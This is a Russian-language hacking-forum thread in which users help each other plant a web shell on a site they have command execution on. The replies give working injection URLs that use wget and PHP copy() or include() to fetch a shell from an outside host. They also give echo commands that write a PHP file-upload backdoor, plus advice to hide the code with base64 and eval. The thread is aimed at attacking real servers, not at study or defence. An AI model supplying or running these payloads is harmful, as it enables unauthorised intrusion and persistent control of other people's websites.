Форум АНТИЧАТ - Как закачать шел!

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Как закачать шел! (https://forum.antichat.xyz/showthread.php?t=48289)

Как закачать шел!

Народ подскажите как можно закачать шел(хотябы от рст).Из качалок есть wget.При запросе http://site.com/t.php?cmd=wget%20-o%201.php%20http://site.com/shell.txt создается файл 1.php а в нем
--11:39:54-- http://site.com/shell.txt
=> `shell.txt'
Resolving site.com
Connecting to site.com:80... failed: Connection refused.
Из конфигов пароли не подходят к фтп.

а другие качалки не пробовал, должен быть наверняка lynx. а может еще эти fetch, curl, links (??), get http://someshit.com/a.php > shell.php(/somedir/1.txt), хз больше не помню.. и еще закачай маленький по размеру шелл, например TNC WebShell v0.8 (см. в разделе "Избранное") а то хз чз адрес бар иногда лаги.. иногда у меня через адрес бар не читается /etc/passwd хотя весит пару сотен килобайт.. )) кароче эксперементируй )) ;)

или попробуй скачивать шелл с другого сайта или такой вариант

Код:

http://site.com/t.php?cmd=echo '<?php copy("http://shellsite.com/shell.txt","1.php"); ?>'>cp.php

а потом вызови
http://site.com/cp.php

либо так же как Scipio сказал, но через инклуд echo+'<?php+include("http://shellsite.com/shell.txt");+?>'>thumb.db.php

ртуть
других качало нету только wget
шел 8кб тоже не качает.через браузер в 1 строчку создает но небольше

Scipio
вот такое вылазиет после запуска:
Warning: copy() [function.copy]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/cp.php on line 1
Warning: copy(http://site.com/shell.txt) [function.copy]: failed to open stream: Success in /www/vhosts/1/www/cp.php on line 1

TANZWUT
вот такое вылазиет после запуска:
Warning: include() [function.include]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/thumb.db.php on line 1
Warning: include(http://site/shell.txt) [function.include]: failed to open stream: Success in /www/vhosts/1/www/thumb.db.php on line 1
Warning: include() [function.include]: Failed opening 'http://site/shell.txt' for inclusion (include_path='.:/usr/local/include/php') in /www/vhosts/1/www/thumb.db.php on line 1

Какие есть еще идеи?

ты откуда шелл скачиваешь?

чет я сомневаюсь, что серв обрубает соединение на 80 порт

Скачиваю сосвоего сервака.На другие скачивается а вот на этот сервак чет некачает

попробуй этот код;)

PHP код:


		
			
'<form enctype=multipart/form-data  method=post><input name=userfile type=file><input type=submit name=go_up></form>

<?php 

if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};

?>'

т.о. со своего компа загрузиш шелл

ну я тогда незнаю тока такой вариант:

Код:

http://site.com/t.php?cmd=echo '<?php $filename   = $_FILES['userfile']['name']; move_uploaded_file($_FILES['userfile']['tmp_name'], "shell.php");?>'>cp.php

http://site.com/t.php?cmd=echo '<form enctype="multipart/form-data" method="post">'>>cp.php

http://site.com/t.php?cmd=echo 'Отправить этот файл: <input name="userfile" type="file" />'>>cp.php

http://site.com/t.php?cmd=echo '<input type="submit" value="Send File" /></form>'>>cp.php

и запускай http://site.com/cp.php

можно и одной строкой, весь код в base64 забубенить и при помощи eval выполнять...